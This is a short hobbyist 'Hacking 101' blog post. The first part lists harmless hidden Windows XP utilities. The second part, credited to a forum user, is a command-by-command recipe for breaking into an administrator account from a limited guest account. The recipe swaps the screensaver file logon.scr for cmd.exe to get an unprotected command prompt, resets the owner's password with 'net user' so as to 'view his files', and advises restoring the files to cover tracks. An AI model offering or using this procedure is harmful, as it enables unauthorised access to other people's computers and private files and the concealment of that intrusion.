Hacking 101 : “Secret Windows XP Built-In Programs”
Mastered WIndows XP? You’re wrong. Here are some progs that’s “hidden”..not really hidden, simply activate your imagination . Let’s proceed.
Go to start>run>cmd : The ‘values’ will be.
1) Private Character Editor
Function: Create your own logos and fonts.
Value in cmd : “eudcedit”
2) Iexpress
Function: Create your own installer/self-extracting .exe
Value in cmd: “iexpress”
3) Dr. Watson
Function: Program error debugger.
Value in cmd: “drwtsn32″
4) Media Player 5.1
Function: Good ol’ media player, even if you ‘upgrade’, this version will still remain.
Value in cmd: “mplay32″
Additional Comment/s: “Thanks boredom xD”
Tutorial By: Cheesemunk
Meus Sententia’s a hack site?
LOL No, i’m kinda busy these days and rarely open the comp. Only had the time to post hacks that’s saved in my comp. I’ll be posting movie reviews and website reviews as soon as possible. Bon Voyage for now..
~Cheese
EDIT: And getting $$$ fast!
Hacking 101: How to hack windows XP admin password
Using a guest account? Why not hack the owner’s account and view his files.
=======================================
How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root*
cd\windows\system32 *directs to the system32 dir*mkdir temphack *creates the folder temphack*
copy logon.scr temphack\logon.scr *backsup logon.scr*
copy cmd.exe temphack\cmd.exe *backsup cmd.exe*
del logon.scr *deletes original logon.scr*
rename cmd.exe logon.scr *renames cmd.exe to logon.scr*
exit *quits dos*
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
“net user <admin account name here> password”
If the Administrator Account is called Frank and you want the password blah enter this
“net user Frank blah”
and this changes the password on franks machine to blah and your in.
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
======
From: Random user : hf.net
